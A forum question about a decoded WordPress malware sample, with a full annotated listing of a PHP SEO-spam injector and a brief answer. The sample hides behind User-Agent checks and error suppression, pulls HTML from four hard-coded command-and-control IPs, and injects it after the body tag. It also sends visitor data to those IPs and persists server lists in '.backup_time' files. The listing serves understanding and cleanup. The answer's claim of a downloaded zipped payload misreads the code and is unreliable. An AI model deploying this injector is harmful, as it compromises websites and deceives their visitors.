What does this malicious PHP code found in a WordPress install do?


I was able to decode the following PHP script, which I found within the WordPress files. Out of curiosity, can you tell me what the code does? It looks like it has somehow been replicated to other WordPress installs on the same server.

<?php
// NOTE(review): this listing was flattened and lower-cased by the page's text
// extraction. PHP superglobals and constants appear as `$_server`, `$_env`,
// `directory_separator`, `php_eol`, `__file__`, `curlopt_*`, and every
// `foreach` has lost its `as` keyword, so the text as shown is not runnable;
// the original file presumably used `$_SERVER`, `DIRECTORY_SEPARATOR`, etc.
// Tokens are kept exactly as shown on the page; only whitespace and comments
// were added. Summary: an output-buffer hook that, for visitors whose
// User-Agent matches a stored list, fetches HTML from a set of remote IPs and
// injects it right after `<body>` (an SEO-spam / link-injection pattern).

// Silence every warning/notice so the hook never reveals itself in page output.
error_reporting(0);

// The whole file is wrapped in this guard: `zm5j2q0shf_pirogok` does nothing
// but mark "already installed in this process", so including the file twice
// (e.g. from several infected files) registers the hook only once.
if (!function_exists("zm5j2q0shf_pirogok")){
    function zm5j2q0shf_pirogok(){ return false; }

    // Decodes one line of the on-disk state file: base64, then XOR with a
    // keystream built by chaining sha1 over (gamma . seq . salt), 8 bytes per
    // round. The salt and seed are fixed, so the same keystream is produced on
    // every host ("h*" is shown here; presumably "H*" in the original).
    if (!function_exists("uno_decode")){
        function uno_decode($string) {
            $string = base64_decode($string);
            $salt="dc5p9dopbc";
            $strlen = strlen($string);
            $seq = "dmef5hzupq";
            $gamma = "";
            while (strlen($gamma)<$strlen)
            {
                $seq = pack("h*",sha1($gamma.$seq.$salt));
                $gamma.=substr($seq,0,8);
            }
            return $string^$gamma;
        }
    }

    // Collects every writable location the state file may be kept in: the
    // system temp dir, TMP/TMPDIR/TEMP from the environment, the directory a
    // tempnam() probe lands in, upload_tmp_dir, the session save path, and the
    // infected script's own directory. These are the places to search when
    // cleaning up (see `get_true_name` for the file name).
    if (!function_exists("get_t_dir_mass")){
        function get_t_dir_mass() {
            if (function_exists("sys_get_temp_dir")) {
                if (@is_writeable(sys_get_temp_dir())) { $res[] = realpath(sys_get_temp_dir()); }
            }
            if (!empty($_env["tmp"]) && @is_writeable(realpath($_env["tmp"]))) { $res[] = realpath($_env["tmp"]); }
            if (!empty($_env["tmpdir"]) && @is_writeable(realpath($_env["tmpdir"]))) { $res[] = realpath( $_env["tmpdir"]); }
            if (!empty($_env["temp"]) && @is_writeable(realpath($_env["temp"]))) { $res[] = realpath( $_env["temp"]); }
            // Probe: create and immediately delete a temp file next to this
            // script to learn which directory tempnam() falls back to.
            $tempfile=@tempnam(__file__,"");
            if (@file_exists($tempfile)) {
                @unlink($tempfile);
                if (@is_writeable(realpath(dirname($tempfile)))) {$res[] = realpath(dirname($tempfile)); }
            }
            if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { $res[] = realpath(@ini_get("upload_tmp_dir")); }
            if (@is_writeable(realpath(session_save_path()))) {$res[] = realpath(session_save_path()); }
            if (@is_writeable(realpath(dirname(__file__)))) { $res[] = realpath(dirname($tempfile ?? __file__) === null ? __file__ : dirname(__file__)); }
            return array_unique($res);
        }
    }

    // Builds the list of User-Agent substrings that trigger injection. Each
    // line of the state file is decoded with `uno_decode`; lines that contain
    // no "." are treated as `|`-separated UA fragments (lines with a "." are
    // IPs, see `get_know_ip`). With no state file the defaults are "msie",
    // "firefox" and "googlebot", i.e. ordinary browsers and Google's crawler.
    // NOTE(review): `$know` is never initialised, so `count($know)` on an
    // empty run is count(null) — a warning on PHP 7, a TypeError on PHP 8.
    if (!function_exists("get_ua")){
        function get_ua(){
            $name = get_true_name();
            foreach(get_t_dir_mass() $t){
                if(file_exists($t.directory_separator.$name)){
                    foreach (file($t.directory_separator.$name) $tt){
                        $tt = uno_decode($tt);
                        if(strpos($tt,".") === false){
                            $tmp = explode("|",$tt);
                            foreach($tmp $u){ $know[] = trim($u); }
                        }
                    }
                }
            }
            if(count($know) == 0){ $know[] = "msie"; $know[] = "firefox"; $know[] = "googlebot"; }
            return array_unique($know);
        }
    }

    // Name of the state file. Indicator: a file called `.backup_time` in any
    // directory returned by `get_t_dir_mass` (temp dirs, session path, the
    // script's directory).
    if (!function_exists("get_true_name")){
        function get_true_name(){ return ".backup_time"; }
    }

    // True when any of the needles occurs in $haystack (substring match).
    if (!function_exists("strposa")){
        function strposa($haystack, $needle, $offset=0) {
            if(!is_array($needle)) $needle = array($needle);
            foreach($needle $query) {
                if(strpos($haystack, $query, $offset) !== false) return true;
            }
            return false;
        }
    }

    // Gate: everything below is defined and armed only when the visitor's
    // User-Agent contains one of the stored fragments. Requests with a
    // non-matching UA get an untouched page, which is why the injection can
    // be hard to reproduce with a plain HTTP client.
    if (isset($_server["http_user_agent"])){
        $ua = strtolower($_server["http_user_agent"]);
        $true_ua = get_ua();
        if (strposa($ua,$true_ua)){

            // First writable temp directory, same candidate order as
            // `get_t_dir_mass`; used for the gzip round-trip in the callback.
            if (!function_exists("t_dir")){
                function t_dir() {
                    if (function_exists("sys_get_temp_dir")) {
                        if (@is_writeable(sys_get_temp_dir())) { return realpath(sys_get_temp_dir()); }
                    }
                    if (!empty($_env["tmp"]) && @is_writeable(realpath($_env["tmp"]))) { return realpath($_env["tmp"]); }
                    if (!empty($_env["tmpdir"]) && @is_writeable(realpath($_env["tmpdir"]))) { return realpath( $_env["tmpdir"]); }
                    if (!empty($_env["temp"]) && @is_writeable(realpath($_env["temp"]))) { return realpath( $_env["temp"]); }
                    $tempfile=@tempnam(__file__,"");
                    if (@file_exists($tempfile)) {
                        @unlink($tempfile);
                        if (@is_writeable(realpath(dirname($tempfile)))) {return realpath(dirname($tempfile)); }
                    }
                    if (@is_writeable(realpath(@ini_get("upload_tmp_dir")))) { return realpath(@ini_get("upload_tmp_dir")); }
                    if (@is_writeable(realpath(session_save_path()))) { return realpath(session_save_path()); }
                    if (@is_writeable(realpath(dirname(__file__)))) { return realpath(dirname(__file__)); }
                    return null;
                }
            }

            // Command-and-control address list: four hard-coded IPs, plus any
            // decoded state-file line that contains a "." (treated as an IP).
            // The hard-coded addresses are the network indicators to block and
            // to search for in egress logs.
            if (!function_exists("get_know_ip")){
                function get_know_ip(){
                    $know[] = "151.236.14.86";
                    $know[] = "149.154.157.133";
                    $know[] = "37.235.54.48";
                    $know[] = "31.215.205.196";
                    $name = get_true_name();
                    foreach(get_t_dir_mass() $t){
                        if(file_exists($t.directory_separator.$name)){
                            foreach (file($t.directory_separator.$name) $tt){
                                $tt = uno_decode($tt);
                                if(strpos($tt,".")>0){ $know[] = trim($tt); }
                            }
                        }
                    }
                    return array_unique($know);
                }
            }

            // Overwrites `.backup_time` in every candidate directory with the
            // list received from the server, one entry per line. The lines
            // are written as received while the readers above run them
            // through `uno_decode`, so the server presumably sends them
            // already encoded — confirm against a captured response.
            if (!function_exists("save_know_ip")){
                function save_know_ip($ip){
                    $name = get_true_name();
                    $content =  implode(php_eol, $ip);
                    foreach(get_t_dir_mass() $t){
                        $f = fopen($t.directory_separator.$name,"w");
                        fputs($f,$content);
                        fclose($f);
                    }
                }
            }

            // Visitor IP as reported to the server: first proxy-style header
            // holding a plain IPv4 literal, else REMOTE_ADDR. Because the
            // headers are client-supplied, this value is whatever the visitor
            // sends. NOTE(review): `stristr(",", ...)` has haystack and needle
            // swapped, and `isset` is only checked in the first branch.
            if (!function_exists("zm5j2q0shf_get_real_ip")){
                function zm5j2q0shf_get_real_ip() {
                    $proxy_headers = array("client_ip","forwarded","forwarded_for","forwarded_for_ip","http_client_ip","http_forwarded","http_forwarded_for","http_forwarded_for_ip", "http_pc_remote_addr","http_proxy_connection","http_via", "http_x_forwarded", "http_x_forwarded_for", "http_x_forwarded_for_ip","http_x_imforwards","http_xroxy_connection","via", "x_forwarded", "x_forwarded_for");
                    foreach($proxy_headers $proxy_header) {
                        if(isset($_server[$proxy_header]) && preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $_server[$proxy_header])){
                            return $_server[$proxy_header];
                        } else if(stristr(",", $_server[$proxy_header]) !== false) {
                            // Comma-separated list: take the first entry and strip a ":port" suffix.
                            $proxy_header_temp = trim(array_shift(explode(",", $_server[$proxy_header])));
                            if(($pos_temp = stripos($proxy_header_temp, ":")) !== false) $proxy_header_temp = substr($proxy_header_temp, 0, $pos_temp);
                            if(preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $proxy_header_temp) )return $proxy_header_temp;
                        }
                    }
                    return $_server["remote_addr"];
                }
            }

            // URL of the page being served, without its query string.
            if (!function_exists("zm5j2q0shf_get_url")){
                function zm5j2q0shf_get_url(){
                    $url = "http://" . $_server["http_host"] . $_server["request_uri"];
                    if (strpos($url,"?") !== false){ $url = substr($url,0,strpos($url,"?")); }
                    return $url;
                }
            }

            // Fetches http://$ip/$page over plain HTTP on port 80, trying curl
            // (3 s timeout), then file_get_contents, then a raw socket. This
            // outbound request happens from the web server on each matching
            // page view, which makes it visible in egress/firewall logs.
            if (!function_exists("zm5j2q0shf_get_contents")){
                function zm5j2q0shf_get_contents($ip, $page){
                    if((function_exists("curl_init")) && (function_exists("curl_exec"))){
                        $ch = curl_init("http://" .$ip . "/" .$page);
                        curl_setopt($ch, curlopt_returntransfer, 1);
                        curl_setopt($ch, curlopt_timeout, 3);
                        $ult = trim(curl_exec($ch));
                        return $ult;
                    }
                    if (ini_get("allow_url_fopen")) {
                        $ult = trim(@file_get_contents("http://" .$ip . "/" .$page));
                        return $ult;
                    }
                    $fp = fsockopen($ip, 80, $errno, $errstr, 30);
                    if ($fp) {
                        $out = "get $page http/1.0\r\n";
                        $out .= "host: $ip\r\n";
                        $out .= "connection: close\r\n\r\n";
                        fwrite($fp, $out);
                        $ret = "";
                        while (!feof($fp)) {$ret  .=  fgets($fp, 128);}
                        fclose($fp);
                        // Drop the HTTP headers; keep the body.
                        $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4));
                    }
                    return $ult;
                }
            }

            // Asks the servers for the HTML to inject. Each request to
            // /ml.php carries the page URL, the visitor's IP, UA and referer,
            // an affiliate id ("1001") and a per-request nonce `cod`. A reply
            // is accepted only if it contains md5($cod): the text before that
            // marker is a fresh server list (persisted via `save_know_ip`),
            // the text after it (offset +32 = md5 length) is the injected
            // HTML. Servers are tried in random order until one answers.
            // Note `$page` starts with "/" and `zm5j2q0shf_get_contents`
            // adds another, so the request path is "//ml.php?...".
            if (!function_exists("zm5j2q0shf_samui_get_links")){
                function zm5j2q0shf_samui_get_links(){
                    $all = get_know_ip();
                    shuffle($all);
                    $url = zm5j2q0shf_get_url();
                    $real_ip = zm5j2q0shf_get_real_ip();
                    $ua = strtolower($_server["http_user_agent"]);
                    $aid = "1001";
                    $cod = md5($url.time());
                    $check = md5($cod);
                    $ua = urlencode(strtolower($_server["http_user_agent"]));
                    $ref = urlencode(strtolower($_server["http_referer"]));
                    $page = "/ml.php?mother=mycompany.com&cr=1&aid=".$aid."&url=".$url."&ip=".$real_ip."&ua=".$ua."&cod=".$cod."&ref=".$ref;
                    foreach ($all $ip){
                        $tc = zm5j2q0shf_get_contents(trim($ip),$page);
                        $pos = strpos($tc, $check);
                        if ($pos !== false){
                            $proxy_list = substr($tc,0,$pos);
                            save_know_ip(explode("\n",$proxy_list));
                            $links = substr($tc,$pos+32);
                            return $links;
                        }
                    }
                }
            }

            // Inserts the fetched HTML immediately after the first opening
            // `<body ...>` tag; pages without `<body` pass through unchanged.
            // NOTE(review): inside a double-quoted string `\1` is an octal
            // escape (chr(1)), not a back-reference, so as shown the body
            // tag's attributes would be dropped — possibly a quoting artifact
            // of the extraction; verify against the original file.
            if (!function_exists("zm5j2q0shf_mod_con")){
                function zm5j2q0shf_mod_con($con){
                    if (strpos($con,"<body") !== false) {
                        $text = preg_replace("/<body(\s[^>]*)?>/i", "<body\1>".zm5j2q0shf_samui_get_links(), $con,1);
                        return $text;
                    } else {return $con;}
                }
            }

            // Output-buffer callback. If the response is already gzip-encoded
            // the buffer is written to a temp file, decompressed with gzopen/
            // gzread (up to 10,000,000 bytes), modified, and re-encoded;
            // otherwise the buffer is modified directly.
            if (!function_exists("zm5j2q0shf_callback")){
                function zm5j2q0shf_callback($buf){
                    if (headers_sent()){
                        if (in_array("content-encoding: gzip", headers_list())){
                            $tmpfname = tempnam(t_dir(), "foo");
                            $zf = fopen($tmpfname, "w");
                            fputs($zf, $buf);
                            fclose($zf);
                            $zd = gzopen($tmpfname, "r");
                            $contents = gzread($zd, 10000000);
                            $contents = zm5j2q0shf_mod_con($contents);
                            gzclose($zd);
                            unlink($tmpfname);
                            $contents = gzencode($contents);
                        } else {$contents = zm5j2q0shf_mod_con($buf); }
                    } else {$contents = zm5j2q0shf_mod_con($buf);}
                    return($contents);
                }
            }

            // Arms the hook: from here on every page this process renders is
            // passed through `zm5j2q0shf_callback` before being sent.
            ob_start("zm5j2q0shf_callback");
        }
    }
}
?>

It contacts the known parent IPs to download a zipped payload and stores it in one of the temp directories. Depending on the payload, it then injects HTML at the top of the HTML page, just below `<body>`. It also checks for new IPs that can be used to download more of the bad guys' code to inject.

